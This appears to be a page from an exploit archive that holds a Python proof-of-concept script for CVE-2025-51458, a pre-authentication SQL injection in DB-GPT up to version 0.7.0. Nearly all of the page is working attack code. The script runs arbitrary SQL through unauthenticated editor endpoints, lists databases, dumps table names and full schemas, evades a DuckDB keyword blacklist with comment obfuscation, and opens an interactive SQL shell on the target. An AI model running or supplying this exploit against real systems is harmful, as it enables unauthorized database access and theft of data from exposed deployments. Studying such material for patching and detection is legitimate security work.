5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exp.py PY
#!/usr/bin/env python3
"""
CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection
Affected: eosphoros-ai/DB-GPT <= 0.7.0
Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run
Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix)

The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite
connections pass raw SQL directly to query_ex() with no filtering.
DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT).

Usage:
    python3 exp.py <target> <db_name> [--sql "SELECT ..."]
    python3 exp.py <target> <db_name> --dump-tables
    python3 exp.py <target> <db_name> --dump-db
    python3 exp.py <target> --list-dbs
"""

import argparse
import json
import sys

import requests


def sql_run(target, db_name, sql):
    url = f"{target.rstrip('/')}/api/v1/editor/sql/run"
    payload = {"db_name": db_name, "sql": sql}
    try:
        r = requests.post(url, json=payload, timeout=30)
        data = r.json()
        if data.get("success"):
            result = data.get("data", {})
            columns = result.get("colunms", [])
            values = result.get("values", [])
            return columns, values
        else:
            print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
            return None, None
    except Exception as e:
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None, None


def chart_run(target, db_name, sql, chart_type="bar"):
    url = f"{target.rstrip('/')}/api/v1/editor/chart/run"
    payload = {"db_name": db_name, "sql": sql, "chart_type": chart_type}
    try:
        r = requests.post(url, json=payload, timeout=30)
        data = r.json()
        if data.get("success"):
            return data.get("data", {})
        else:
            print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
            return None
    except Exception as e:
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None


def list_databases(target):
    url = f"{target.rstrip('/')}/api/v1/editor/db/list"
    try:
        r = requests.get(url, timeout=10)
        data = r.json()
        if data.get("success"):
            return data.get("data", [])
        return None
    except Exception as e:
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None


def print_table(columns, values):
    if not columns:
        return
    widths = [len(str(c)) for c in columns]
    for row in values:
        for i, v in enumerate(row):
            widths[i] = max(widths[i], len(str(v) if v else "NULL"))

    header = " | ".join(str(c).ljust(widths[i]) for i, c in enumerate(columns))
    sep = "-+-".join("-" * w for w in widths)
    print(header)
    print(sep)
    for row in values:
        line = " | ".join(
            str(v if v else "NULL").ljust(widths[i]) for i, v in enumerate(row)
        )
        print(line)
    print(f"\n({len(values)} rows)")


def detect_db_type(target, db_name):
    # Try MySQL
    cols, vals = sql_run(target, db_name, "SELECT VERSION()")
    if cols and vals:
        version = str(vals[0][0]).lower()
        if "mariadb" in version or "." in version:
            return "mysql" if "mariadb" not in version else "mariadb"

    # Try PostgreSQL
    cols, vals = sql_run(target, db_name, "SELECT version()")
    if cols and vals and "postgresql" in str(vals[0][0]).lower():
        return "postgresql"

    # Try SQLite
    cols, vals = sql_run(target, db_name, "SELECT sqlite_version()")
    if cols and vals:
        return "sqlite"

    return "unknown"


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection"
    )
    parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)")
    parser.add_argument("db_name", nargs="?", help="Database name")
    parser.add_argument("--sql", help="Custom SQL to execute")
    parser.add_argument(
        "--list-dbs", action="store_true", help="List available databases"
    )
    parser.add_argument(
        "--dump-tables", action="store_true", help="Dump table names"
    )
    parser.add_argument(
        "--dump-db", action="store_true", help="Dump all table structures"
    )
    parser.add_argument(
        "--chart", action="store_true", help="Use chart endpoint instead"
    )
    parser.add_argument(
        "--duckdb-bypass",
        action="store_true",
        help="Use comment obfuscation for DuckDB",
    )
    args = parser.parse_args()

    print(f"[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection")
    print(f"[*] Target: {args.target}")

    if args.list_dbs:
        dbs = list_databases(args.target)
        if dbs:
            print(f"\n[+] Found {len(dbs)} database(s):")
            for db in dbs:
                name = db.get("db_name", db) if isinstance(db, dict) else db
                db_type = db.get("db_type", "?") if isinstance(db, dict) else "?"
                print(f"    - {name} ({db_type})")
        else:
            print("[-] No databases found or endpoint not accessible")
        return

    if not args.db_name:
        parser.error("db_name is required unless using --list-dbs")

    if args.sql:
        sql = args.sql
        if args.duckdb_bypass:
            sql = sql.replace("SELECT", "SEL/**/ECT")
        print(f"[*] Executing: {sql}\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        return

    if args.dump_tables:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")

        if db_type in ("mysql", "mariadb"):
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()"
        elif db_type == "postgresql":
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'"
        elif db_type == "sqlite":
            sql = "SELECT name FROM sqlite_master WHERE type='table'"
        else:
            sql = "SELECT table_name FROM information_schema.tables"

        print(f"[*] Dumping tables...\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        return

    if args.dump_db:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")

        if db_type in ("mysql", "mariadb"):
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = DATABASE() "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "postgresql":
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = 'public' "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "sqlite":
            # SQLite: get tables first, then PRAGMA for each
            cols, vals = sql_run(
                args.target,
                args.db_name,
                "SELECT name FROM sqlite_master WHERE type='table'",
            )
            if cols and vals:
                for row in vals:
                    table = row[0]
                    print(f"\n[*] Table: {table}")
                    tc, tv = sql_run(
                        args.target,
                        args.db_name,
                        f"PRAGMA table_info('{table}')",
                    )
                    if tc:
                        print_table(tc, tv)
            return
        else:
            sql = "SELECT table_name, column_name, data_type FROM information_schema.columns"

        print(f"[*] Dumping schema...\n")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        return

    # Default: interactive mode
    print(f"[*] Database: {args.db_name}")
    print(f"[*] Interactive SQL mode. Type 'exit' to quit.\n")
    while True:
        try:
            sql = input("SQL> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not sql or sql.lower() == "exit":
            break
        if args.duckdb_bypass:
            sql = sql.replace("SELECT", "SEL/**/ECT")
        cols, vals = sql_run(args.target, args.db_name, sql)
        if cols:
            print_table(cols, vals)
        print()


if __name__ == "__main__":
    main()